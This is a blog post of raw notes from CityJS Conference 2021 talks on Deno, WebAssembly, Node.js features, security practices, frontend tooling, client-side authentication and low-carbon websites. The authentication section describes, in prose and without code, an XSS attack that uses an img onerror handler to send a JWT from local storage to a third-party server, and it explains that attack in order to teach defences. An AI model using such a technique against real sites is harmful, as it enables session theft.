Categories
Node.js

Notes from CityJS Conference 2021

17 min read

CityJS Conference 2021 ran from March 24th – 26th. The conference was run as a collaborative effort by four London JavaScript communities: London JavaScriptJS MonthlyHalfStack London and London Node.js User Group.

I’ll add links to talk videos when they’re available.

Fair warning: The talk notes I’m sharing here are in a fairly raw state and provided with no warranty – I’ve tried to make sure I’ve noted down all the details accurately, but I can’t guarantee that it’s all 100% correct!

Jump links

Talk: Deno and TypeScript: The Good, The Bad and The Ugly

Speaker

Kitson P. Kelly (@kitsonk)

Key takeaways

TypeScript is a first class language in Deno – you don’t need any extra tooling to use it. A lot of work has been done to improve execution speed at runtime (focused on compilation and type checking). Alongside this work, a Language Server is being developed to provide tight integration with code editors.

Talk abstract

Deno, a runtime for JavaScript, TypeScript and WebAssembly treats TypeScript as a first class language. Doing that can be hard work. In this talk we will explore how Deno makes running TypeScript a first class language.

My notes

Deno – https://deno.land/

Kitson has been involved with Deno from the early days. He has written oak, a middleware framework for Deno (like Express or koa).

Deno is a command line runtime for JavaScript, TypeScript and WebAssembly. Written Rust and v8.

TypeScript is a first class language in Deno Deno can type check your JavaScript too

TypeScript is a "fully erasable type system for JavaScript"

TypeScript compiler (tsc) is embedded in Deno – provides type checking and transpiling for the language

Deno statically analyses code at runtime, automatically pulls in dependencies from URLs and writes them to a cache.

TypeScript > JavaScript > V8

"TypeScript tax" – Lots of hard work has been done to reduce the performance impact of TypeScript compilation in Deno – at one point TypeScript execution was 50x slower than using JavaScript.

Mid 2020 the Deno compiler moved to Rust. Started to introduce some significant improvements to execution time.

Not feasible to rewrite TypeScript checking in Rust as it would splinter things away from the work being done by the TypeScript team.

Deno features:

  • All type libraries included in CLI binary
  • Supports JSX + TSX out-of-the-box (React transformation by default)
  • … (lots of them, but I didn’t have time to note them)

Deno Language Server is currently in development – uses tsc, provides access to deno lint + fmt.

https://deno.land/manual/getting_started/setup_your_environment#lsp-clients

Future of Deno (lots of work on performance):

  • Improving performance of Deno Language Server
  • Improve how TypeScript compiler is used
  • Working on parsing performance improvements

Related links

Talk: Supercharge your JavaScript with WebAssembly

Speaker

Tamas Piros (@tpiros)

Key takeaways

WebAssembly allows you to run native apps in user’s browsers. You can write code in C, C++, .NET languages, Java, Ruby, Go, Java, PHP, Python, TypeScript or Rust. This code has access to the browser DOM and is able to write to a virtual file system. WebAssembly is well suited to low-level and CPU intensive tasks.

Talk abstract

WebAssembly is an emerging technology that allows us to expand the capabilities of the web today. Is it a competitor of JavaScript? Should you learn it today? Join this talk to find out more about the possibilities of WebAssembly.

My notes

Web Platform as of 2018 – Browser = Virtual Machine for JS code execution, Web APIs

JavaScript great for leveraging ecosystem, but has limits e.g. not good for CPU intensive work, low-level tasks.

WebAssembly was created in 2015. asm.js predates WebAssembly (2013), allowed apps written in C to run as web apps.

Since 2019 WebAssembly is a W3C recommendation – part of the web standards specifications.

Official description: "WebAssembly is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides langauges such as C/C++ and…"

A simpler description: WebAssembly allows you to run native apps on the web

WebAssembly functions can be exposed to JavaScript.

WebAssembly is not here to replace JavaScript – it enhances / augments it. It’s a complimentary language to JavaScript.

Web Platform today – Browser = Virtual Machine for JavaScript execution + Virtual Machine for WebAssembly execution, Web APIs

WebAssembly has a JavaScript API for:

  • Loading modules – compiled WebAssembly binary (.wasm file)
  • Creating new memory and table isntances

Creating a .wasm file:

  • Write code in C, C++, .NET languages, Java, Ruby, Go, Java, PHP, Python, TypeScript or Rust
  • Use Emscripten or use direct compile targets to produce .wasm
  • Load & consume via JavaScript

Languages which can compile to WebAssembly: https://github.com/appcypher/awesome-wasm-langs

Compiling C code to WebAssemly = generates .js file and a .wasm file Can load the JavaScript in an HTML page and call the functions exposed by the C code (compiled to WebAssembly)

You can access the browser DOM from your original source code e.g. in Go:

js.Global().Get("document").Call("getElementById", "some-element")

WebAssembly allows you to write code which does low level work – e.g. image parsing with Go – in the browser.

WebAssembly allows you to access a virtual machine file system. This means you can write files (temporarily).

Don’t think it was specifically mentioned in the talk, but I noticed that Cloudinary allows you to run WebAssembly on their CDN – https://cloudinary.com/documentation/custom_functions

Related links

Talk: New and experimental features in Node.js core

Speaker

Beth Griggs (@BethGriggs_)

Key takeaways

Node.js doesn’t have a formal roadmap, so it can sometimes to be tricky to tell what’s coming next. A good way is to keep an eye on the work of Working Groups and Teams in GitHub, as well as Strategic Initiatives (links below).

Marking features as experimental allows for user feedback and iteration on the APIs.

Talk abstract

Node.js core does not have an official roadmap – it’s the sum of the interests and efforts of the contributors that determines the future direction of the project. The evolution of a new feature in Node.js can take different twists and turns. Some new features land as experimental, to give time to gather user feedback before they’re considered stable. Other features will land as stable from the start. So, what’s in the pipeline? This talk will take a look at some of the new and experimental features in Node.js core.

My notes

Node.js is an impact project under the OpenJS Foundation, alongside jQuery, Electron and others.

Node.js doesn’t have a formal roadmap, or a corporate sponsor.

There is a heavy activity flow, so it’s not always obvious what’s coming next with Node.js.

How can you tell what’s coming next with Node.js?

  • nodejs.medium.com
  • Twitter – contributors share what they’re working on
  • Subscribe to the node GitHub repositories – notifications can be overwhelming though

Working Groups and Teams e.g. Build Working Group, Package Maintenance Working Group, Next-10 Team

https://github.com/nodejs/TSC/blob/main/WORKING_GROUPS.md#current-working-groups

If you’re interested in getting involved with Node.js, these working groups and teams can be a good starting point. Check out their GitHub repositories and watch their meetings.

Technical Steering Committee Strategic Initiatives

Community Committee Strategic Initiatives

Next 10 Team (https://github.com/nodejs/next-10) – Reflected on last 10 years, what went well, extracted core values and constituencies. e.g. when reviewing a PR – does this align with our value of Developer Experience.

https://github.com/nodejs/node/blob/master/doc/guides/technical-values.md

Next 10 Survey – https://www.surveymonkey.com/r/86SSY9Q Your chance to indicate what’s important to you in the future of the Node.js runtime.

Distinct flow for releases – Current, Active Long Term Support (LTS), Maintenance LTS

Maintenance tends to be restricted to security and critical bug fixes. Typically there is a new release every 2 weeks for the Current release line. Sometimes features are not backported.

Release working group has a draft release schedule – https://github.com/nodejs/Release#readme

Project is very dependent on volunteers, so schedule is provisional.

Stability Index for features:

  • Stability 0 – Deprecated – Features have deprecation IDs e.g. DEP1045
  • Stability 1 – Experimental – Not recommended for use in production
  • Stability 2 – Stable – Compatibility with npm ecosystem high priority.

https://nodejs.org/api/all.html#documentation_stability_index

Pending deprecations – can tell node to emit pending deprecation warnings with --pending-deprecation flag.

Runtime deprecations- warning messages emitted to stderr e.g. that unhandled promise rejections will throw by default in Node.js v15 onwards.

--no-deprecation will silence deprecation warnings (not generally advised)

Experimental features – APIs may change, even in long-term support, use with caution in production workloads

Marking features as experimental allows for user feedback and iteration on the APIs.

Some current experimental core modules:

  • Async Hooks – inc. AsyncLocalStorage – under discussion to move to Stable.
  • Diagnostics Channel – pub/sub API for sending diagnostics messages.
  • Inspector – API for interacting with V8 inspector e.g. CPU profiler, Heap profiler
  • Trace Events – allows you to centralise tracing events from Node core, V8 or your own code.
  • WebAssembly System Interface (WASI)

Some current experimental APIs:

  • ECMAScript Modules Experimental APIs – Core API is stable in v15 (soon to be marked stable in v12 and v14), but Loaders API, JSON Modules, WASM Modules are all still experimental.
  • ECMAScript Top-level await – Allows you to await code outside of an async function i.e. at the "top-level".
  • Policies – Security feature. Create manifest policy file and code will be verified against it at runtime.
  • Timers Promises API – Timer functions which return Promises.
  • Other experimental APIs – buffer.Blob, Web Crypto API

Experimental flags – to use some of these features you need to pass a command line flag to node e.g. --experimental-wasm-modules

Very experimental features – You’ll need to build and compile the node binary yourself with specific flags.

Stable – Semantic Versioning applies, compatibility is a priority – exception e.g.

How / when do features get promoted to Stable? – Depends on the contributors actively working on it, as well as user feedback. Some features may never be made Stable and could be removed.

Other new features:

  • AbortController
  • npm v7 (bundled with ) introduces new command – npm diff – allows you to compare two versions of a package
  • Source map v3 support (stable as of v15.12.0)
  • V8 9.0 – includes RegExp match indices

First release of Node.js 16 scheduled for 20th April 2021 – even numbered release, so will be promoted to Long Term Support in October 2021.

Node.js 10 end-of-life at end of April 2021 – no more bug or security files.

Talk: 10 secrets to improve Node.js Security

Speaker

Erick Wendel (@erickwendel_)

Key takeaways

Do not block the event loop, Use an API gateway, Avoid sequential identifiers and default ports, Monitor npm packages, Manage environment variables, Be careful when using Docker, Handle network policies, Static code analysis, Monitor your infrastructure, Lock your computer after using it.

Talk abstract

In this talk, attendees will see examples of the real world for avoiding common mistakes. By use of practices and tools, they will learn how to perform changes in their existent applications to run it with no worries. We’ll use Javascript as a context but these tips would be used in any language/platform.

My notes

Who cares about app security? Lots of people share usernames and passwords, release new apps and versions regardless of the costs.

flatmap-stream npm package was compromised in 2018 and stole money from Bitcoin wallets.

Prototype pollution security vulnerability – affected lodash and jQuery

Cash Overflow attack – Denial of Service attack against serverless resources exposing you to high hosting bills

No. 10 – Do not block the event loop – use streams for processing large amounts of data e.g. CSV file > Buffer > Chunks > Processing. Regular expressions can also block the event loop if you’re not careful.

No. 9 – Use an API gateway – Can provide API authentication, rate limiting, throttling etc.

No 8. Avoid sequential identifiers and default ports – Don’t expose services on default ports (e.g. PostgreSQL). Don’t have sequential user IDs e.g. /user/1 – use UUIDs.

No. 7 – Monitor npm packages – Audit packages before you install them with https://github.com/lirantal/npq/

No. 6 – Manage environment variables – Don’t put passwords and secrets in plain text in your application. Cloud services have solutions you can use e.g. AWS Secrets Manager. Other solutions: Vault by HashiCorp, git-crypt tool.

No. 5 – Be careful when using Docker – Don’t expose the Docker daemon socket, limit capabilities to only what your container needs, set volumes to read-only. Don’t use docker-compose in production, use Kubernetes instead.

No. 4 – Handle network policies – Default deny all egress traffic in Kubernetes. In Node.js there is an experimental Policies module.

No. 3 – Static code analysis – eslint-plugin-security to help you detect unsafe JavaScript. For Node.js specifically, eslint-plugin-security-node. SonarQube can help with code quality and security.

No. 2 – Monitor your infrastructure – We should know a problem before our customers e.g. use tools like New Relic and AppDynamics. AWS CloudTrail is good for auditing everything that is happening with your infrastructure.

No. 1 – Lock your computer after using it – if you don’t you’re leaving yourself completely vulnerable.

Talk: The Third Age of JavaScript

Speaker

Shawn Swyx Wang (@swyx)

Key takeaways

The First Age of JavaScript was focused on building the language, The Second Age on forming the ecosystem, and the current Third Age is focusing on clearing legacy assumptions (move to ES modules, death of IE11, reducing the mess of JS tooling).

Talk abstract

The way we write JavaScript in 2030 will be completely different than in 2020. Here’s why: the slow death of IE11 and rollout of ES Modules will converge toward a new generation of JavaScript tooling. These tools are faster, typesafer, and polyglot, leading to both a better developer and user experience. Change is afoot!

My notes

The ages:

  • The First Age – 1997 – 2007
  • The Second Age – 2009 – 2019
  • The Third Age – 2020 – 2030

The First Age of JavaScript (1997 – 2007)

Building a language

Brendan Eich joined Netscape to write Scheme in the browser, but was asked to write something Java-like for the browser instead. JavaScript was born.

Forming the language – ECMAScript 1, 2, 3 in first few years, then a long gap with limited progress (ECMAScript 4 was abandoned), pivotal year in 2008

Two tracks:

  • Dialects: ActionScript, JScript, Qt, WMLScript
  • Standard: jQuery, dojo toolkit, mootools

2008 – The Oslo Meeting – Harmony was reached! It’s why ECMAScript 5 was codenamed "Harmony".

The Second Age of JavaScript (2009 – 2019)

Forming of the ecosystem

2009 – CommonJS as a module format Node.js as a runtime Birth of npm

Many of the things we’re still working with today.

Runtimes:

  • 2009 – Node.js, Chrome
  • 2013 – Electron
  • 2015 – React Native
  • 2019 – Hermes (optimised for Android execution)

Build tools:

  • 2009 – Google Closure Compiler, CoffeeScript
  • 2012 – Grunt, Webpack, TypeScript
  • 2014 – Gulp, Traceur compiler
  • 2015 – 2018 – Babel, Rollup, Parcel, Bazel

Frameworks:

  • 2010 – Angular, Backbone
  • 2012 – Meteor
  • 2013 – 2014 – React, Vue
  • 2017 – Svelte

This is the story so far.

The Third Age of JavaScript (2020 – 2030)

Clearing Legacy Assumptions – Prediction: this is the dominant theme for the next 10 years.

The Shift Left in JS Tooling – TypeScript, …

Left – write code, Right – deploy code in production – more expensive to catch bugs in production, strong business case for shifting left.

Related talks:

Moving off of CommonJS – ESModules, Death of IE11

Reducing the mess of JavaScript Tooling – TypeScript, Rust, Go, Collapsing Layers

Clearing the crud.

ES Modules in the Third Age of JavaScript

What’s an ES Module? It’s using import and export at it’s most basic. Now supported in browsers, so you don’t need to bundle in development. In production you should probably still bundle (recommendation of V8 team if you have 300+ modules).

In future: official loader hooks, native module APIs…

Benchmark with – Create React App vs Vite + React – Vite takes almost no time to start up, CRA has a long install / build time

Limitations:

  • Browser support – We’re tracking the death of IE 11 – Twitter, Microsoft, LinkedIn, dailymotion, Adobe, GoDaddy, Skill Share have all dropped support. US government websites are close to dropping support (usage of IE11 is currently 2.6%, their level for support is > 2% users). Official end-of-life in 2029.

Microsoft Edge has an IE mode – can upgrade to Edge and use apps which need IE in IE mode

Adoption is happening for ES Modules! e.g. Sindre Sorhus is rewriting his 1,000+ modules to be only ESM.

Third Age – New Tooling

Moving away from JavaScript tooling written in JavaScript.

The Assumptions:

  • For JS by JS – "JS tools should be written in JS, so that JS developers can understand and contribute to the tools they use"
  • Unix Philosophy – "Each tool should do one thing well"

We’re starting to question these assumptions.

TypeScript took over – nearly all libraries in React ecosystem have re-written their core in TypeScript

ESBuild – alternative to Webpack, written in Go, about 100x faster

Rust core – Deno, Relay, Volta

Ditch the JS Core – Systems Core Scripting Shell (with a diagram I can’t represent!)

What functions belong together?

Why are all these different things?

  • Typechecking – TypeScript
  • Transpiling – Babel
  • Formatting – Prettier
  • Linting – ESLint
  • Testing – Jest
  • Bundling – Webpack, Rollup, Parcel

It becomes very slow as they’re all running separately. Separate configuration.

Sweeping It Under A Rug – Create React App – Bundles everything together

Related article: React Distros and The Deployment Age of JavaScript Frameworks

The way forward: Collapsing layers

"Rome is designed to replace Babel, ESLint, Webpack, Prettier, Jest and others" – https://rome.tools/

Deno builds a lot of things in to the core

The third age may be JavaScript’s last – The Death of JavaScript?

Related talk by Gary Bernhardt – The Birth & Death of JavaScript

"The Universal Virtual Machine" of JS described by Brendan Eich could be replaced with WebAssembly (WASM)

This is talk is a discussion piece, a theory. Open for debate.

Related links

Talk: Next-gen Frontend tooling

Speaker

Pavithra Kodmad (@PKodmad)

Key takeaways

Many front end development tools are slow and painful to configure, but things are starting to change. Vite is one of the next generation of tools which approach things differently. It takes advantage of ES modules, provides hot module reloading (HMR) for React and Vue, supports TypeScript and JSX out-of-the-box and is fast.

Talk abstract

Bundling and Frontend tooling in general has gained special interest among many members of the coding community. We are seeing the beginnings of many innovations in tooling that will surely breakthrough to mainstream and make developer and users lives a lot better. Let’s peek at what these might be.

My notes

There is a large tooling stack for JavaScript applications.

We use a multiverse of tools which build on each other – possible due to the creation of Node.js and npm

Lacks compilation, no static typing, no module system for a long time

Commonly used tools:

  • tsc compiler
  • Babel transforms
  • CSS & postcss
  • Testing tools e.g. Test, Mocha, ava
  • Bundlers – Rollup, Webpack, Parcel

These tools are state of the art right now, but JS developers have problems with them.

Problems with JS tools:

  • Hot Module Reload (HMR)
  • Source maps 🙁
  • Tragic config – different and quirky plugin systems
  • Everything is slow – startup time is very slow

What are we doing about these problems?

ECMAScript (ES) modules – came in ES6, most bundlers until now have assumed CommonJS

Non JS tooling – ESBuild (written in Go), very fast – "aeons faster than anything we could write in Node.js"

ESM is awesome for development – @web/web-server (?), Snowpack, Vite (from the creator of Vue, Evan You)

https://vitejs.dev/

Vite features:

  • Only changed files will be reloaded (HMR)
  • HMR support for Vue and React
  • TypeScript and JSX support
  • Instant server start and file load
  • Uses Rollup
  • Vite browser plugin

Prebundling – Vite handles pre-bundles JavaScript files for node_modules to avoid blocking browser with loading hundreds of script. Separate modules aren’t always convenient.

Multiple entry points – "Multi-Page App" – Configure via rollup options

Library mode (not supported by Snowpack) – helps with bundling browser-oriented libraries for distribution (outputs ESM and UMD versions)

Vite dev server – Automatically handles referencing image paths or inlining them as base64 strings

Dynamic imports polyfill – Helps polyfill support for browsers which don’t yet support it

Universal plugin support – Vite supports Rollup plugins

Mentioned the Third Age of JavaScript e.g. ES modules, non-JS tooling for JS, development of new bundler standardization

Talk: Authentication, authorisation and security for modern client-side applications

Speaker

Kati Frantz (@bahdcoder)

Key takeaways

It’s important to follow security best practices for every application we develop. The OWASP Top 10 is a great starting point for learning about the most common security risks and how to mitigate them.

My notes

New ways being invented of building applications every day, but security is a fundamental concern.

OWASP Vulnerabilities:

  • Broken authentication – e.g. user password is hacked, user session stolen.
  • Cross-site scripting attacks – code executed on your website by a malicious third-party.
  • Components with known vulnerabilities

Broken authentication

Broken authentication scenario:

  • You work at Stripe and build bank account withdrawal functionality
  • Stripe customer walks into cafe with their laptop, goes to order a pizza and forgets laptop open
  • A hacker has been following the user for days – accesses the open laptop and withdraws money

Remedies for broken authentication:

  • Enforce more secure passwords
  • Reauthenticate for high value actions (Stripe does this)
  • Inactivity timeouts to automate logouts

Cross-site scripting attacks

You are vulnerable to these when dangerously executing user provided data.

Cross-site scripting (XSS) example: https://github.com/bahdcoder/xss-attacks-example

In the example:

  • Query string value (search keywords) rendered directly on the page
  • <img> tag with no src, onerror run JavaScript to make a request with fetch
  • Could easily extract JWT from local storage and send to a malicious third-party server

Don’t use dangerouslySetInnerHTML in React unless you know you can absolutely trust the data you are passing to it.

Content Security Policies can help, important to include in your application. Tells the browser which origins to trust – JavaScript will only be loaded from those origin sources e.g. your own site domain, third-parties which you have integrations with.

Components with known vulnerabilities

  • Analyse and choose components and packages wisely
  • Cross-site scripting attacks – ensure that third-party components are not vulnerable to XSS
  • Use a third-party dependency monitor e.g. Snyk

Authentication

Traditional web app – Browser > User request to backend, which will return a JSON Web Token (JWT) or a cookie

Which should we use for verifying that the user is authenticated?

Option 1: HTTP only cookie

Sent via Set-Cookie response header – HttpOnly cookies are not readable via JavaScript in the browser, but the cookie is automatically sent by the client for future browser in requests.

Cross-domain problems e.g. front end on one domain and back end on another domain, can cause problems with setting cookies if you’re not able to control the domain.

Example: https://github.com/bahdcoder/http-only-cookies

Option 2: JSON Web Tokens (JWT)

If JSON Web Tokens are long lived they can be abused as they can’t be revoked.

A safer way to use JWT is to set a short expiry e.g. 15 minutes, but also generate a refresh token.

Refresh token should be regularly rotated and the back end should only allow them to be used once. Only save the refresh token to local storage.

Example: https://github.com/bahdcoder/refresh-token-rotation

Related IETF specification: OAuth 2.0 for Browser-Based Apps

Related links

Talk: A developers guide to low carbon websites

Speaker

Tim Benniks (@timbenniks)

Key takeaways

The environmental impact of the Internet is huge – if it was a country, it would be the world’s sixth biggest polluter. The good news is that there are lots of small steps which we can take to help reduce the carbon footprint of the websites we build.

Talk abstract

How to make more sustainable choices in the production of web technology. This talk helps developers to make changes to their code so that their website has a lower carbon footprint.

My notes

Internet is a huge consumer of electricity, producing a lot of CO2

Unagi – State of awareness of everything – how you might feel after this talk

Some stats:

  • If Internet was a country, would be the world’s 6th biggest polluter
  • The Internet consumes 466TWh per year (UK consumes 300 TWh per year)
  • Average website produces 1.76 grams CO2 per page view
  • 10,000 monthly page views = 211kg CO2 per year

How this is calculated? By websitecarbon.com

  • Data transfer over the wire
  • Energy intensity of web data
  • Energy source used by data centre
  • Carbon intensity of electricity, website traffic

Three areas of interest:

  • UX & Design
  • Front end development best practice
  • Digital Experience (DXP) architecture choices

How is your website impacting the planet? Use websitecarbon.com to look at the impact

Design & Content

Shitty accessibility and UX are high offenders

Proper usability and SEO improve things

If page is easy to find and easy to understand people need their device less, less HTTP requests = lower footprint

Convey the message in as little content as possible

At least follow best practices – rough tool to cover the basics e.g. Lighthouse

What can you do about accessibility (A11Y) as a web developer?

  • Practice inclusive design
  • Make code compliant with WCAG A + AA
  • Make everything relative – EM, REM, % – e.g. Firefox doesn’t scale everything with pixels

SEO

  • Canonical URL
  • Proper title and description
  • sitemap.xml
  • Schema.org rich data
  • Proper Open Graph tags
  • No 404 / 500 errros
  • Use HTTPS
  • Use semantic HTML
  • Correct page outline

All of these things can help people find / buy what they need quicker.

Performance of front end has a huge impact on the carbon footprint

3 years ago, a web page had an average of 4 grams CO2 emissions – nowadays this is 1.75 grams

What are the biggest offenders? Things which are hard to control:

  • Third party libraries, embeds
  • Media assets
  • JS personalization

Generally poorly optimized, might not use green hosting

Eliminate bloat

Remove as many third-party dependencies as possible, or at least lazy load them

Do you really need all of lodash, jQuery, Modernizr, Moment.js?

Make sure library uses import / export (ES modules) so that you can benefit from tree shaking (de-duplication of code) which build tools like Webpack can take care of

Old school JS personalisation libraries loaded via Google Tag Manager tend to be the worst

Marketing people bloat your website through Google Tag Manager, but they have no idea!

"Controversial" opinion: most brands only use 5% of analytics – maybe it’s not worth the bloat?

Progressive enhancement through CSS, JavaScript and content – start simple, make your app work everywhere, treat JS as a feature, not a requirement

Progressive enhancement requires less code, so it has a lower carbon footprint

Mobile first also means thinking about having no Internet connection

Managing images and video is hard – optimize assets for smallest files size, correct file type, correct resolution – do it for each context it’s used in e.g. different responsive breakpoints.

Google Stadia can deliver 4K video with minimal input lag, but we can’t show a simple image on a web page?!

You can DIY an image optimization pipeline, but it’s expensive and time consuming. Use a platform which does it for you – they’re generally not expensive.

Lazy load all the things – only load something when the user needs it. Don’t waste resources.

You can use HTML attribute loading="lazy" on images and videos, but you can also do it for things like third-party libraries.

Lazy load YouTube video = video image showing a play button, only embed the video when the user clicks on it.

Beware of GDPR – sometimes you can’t lazy load

Digital Experience (DXP) architecture

DXPs combine multiple tools to create a platform – provide context for the user, generally chosen by marketers e.g. content management, newsletters digital asset management, personalization, A/B testing, CRM, analytics.

Traditionally one system which does everything – Sitecore, Adobe AEM, Drupal etc.

Issues: cost, performance, security, power consumption, scalability – these monolithic systems are always on

Jamstack to the rescue – not the right choice for all websites, but can work for many of them

Jamstack = User > CDN Edge > Netlify magic.

You can add SASS providers e.g. for a Headless CMS.

Look at services, functions as microservices – make them stateless and stupid

All the server farms have a lot of servers, consume so much power – choose a hosting partner and CDN with a low-carbon footprint. Persuade your clients to do the same.

Recap:

  • Follow general UX & SEO guidelines
  • Follow performance guidelines
  • Reduce bloat
  • Deal with media assets
  • Choose the right architecture
  • Choose a green host / CDN